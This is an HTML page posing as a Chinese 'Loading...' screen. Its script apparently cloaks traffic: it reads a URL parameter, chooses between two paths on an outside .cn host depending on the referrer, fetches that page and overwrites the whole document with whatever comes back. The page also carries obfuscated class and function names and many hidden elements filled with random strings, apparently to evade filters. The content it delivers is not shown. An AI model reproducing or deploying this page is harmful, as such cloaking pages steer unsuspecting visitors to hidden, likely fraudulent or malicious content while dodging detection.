<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LhAh31Ww2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LhAh31Ww2 .UdDF29 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LhAh31Ww2 .content {
            line-height: 50px;
            text-align: center
        }

        .LhAh31Ww2 .img {
            width: 100%
        }

        .LhAh31Ww2 .ggwZG5z90E {
            text-align: center
        }

        .LhAh31Ww2 .ggwZG5z90E span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LhAh31Ww2 .ggwZG5z90E span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LhAh31Ww2 .ggwZG5z90E span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LhAh31Ww2 .ggwZG5z90E span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LhAh31Ww2 .ggwZG5z90E span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LhAh31Ww2 .ggwZG5z90E span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LhAh31Ww2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Ia6lIJaeP4y(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NOkqD = Ia6lIJaeP4y('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NOkqD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NOkqD +".html?a=share";
		}
		
        YCs1UC=url+"#"+new Date().getTime();
        YCs1UC && function() {
            $.get(YCs1UC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >FFI13CcU6ttlD59kXbgKpAM3UpxF8KfyuCqld7hk6lZKMcRYO2lKzvqzTYzUZmUKKtRyPHdohxEJoBW2N2sFmLSDfUeEkmONouZDl</b>
<h1 style='display:none' >BtfbPRvLRWJUEeRPboZQpwXmfJ7KZlhTglnKrQi6zVMtqT0iwY2E6ht8</h1>
<li style='display:none' >TQh3C646B2SipKvGXSATLjiXKU</li>
<a  href='#' style='display:none'>yhJOkAfb8giUO5nru9mFfUyuT0toW5Z6mTAfPozwELu3syxEhA7mj9zWzlhj3X8trCXFt5KaHVIpqug3yeDqgGATyZ</a>
<div style='display:none'>dwzEoYGT1CDiXtb389vZcNIkFBE7Y1XnjXN5IT7GKtzIDSigU1RKrgaSNkWXcYSp2LUD84SIZlzDIlOTtOowHHn</div>
<img  src='' style='display:none'>
<ul style='display:none' >WhHRLrk6UxhMFh97henE5KokGre7UL990EQZD6rrULns56T11e3muxfWnxn7nGsbalRxWnAvgaeaviLhmabIcfEdiaMF8P</ul>
<li style='display:none' >TQh3C646B2SipKvGXSATLjiXKU</li><div class="LhAh31Ww2">
    <div class="UdDF29">
        <div class="ggwZG5z90E">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>Eff95xLdKKYKVVhWPNq</div>
<h1 style='display:none' >WWtqLGCSKiq</h1>
<b style='display:none' >VYuzk4cs7LgYLzPr6myDeBttLjo2BhX</b>
<b style='display:none' >VYuzk4cs7LgYLzPr6myDeBttLjo2BhX</b>
<a  href='#' style='display:none'>zh76ZepIDDf8GnN01xN4ftj8BY1Id</a>
<div style='display:none'>Eff95xLdKKYKVVhWPNq</div>
<h1 style='display:none' >WWtqLGCSKiq</h1></body>
</html>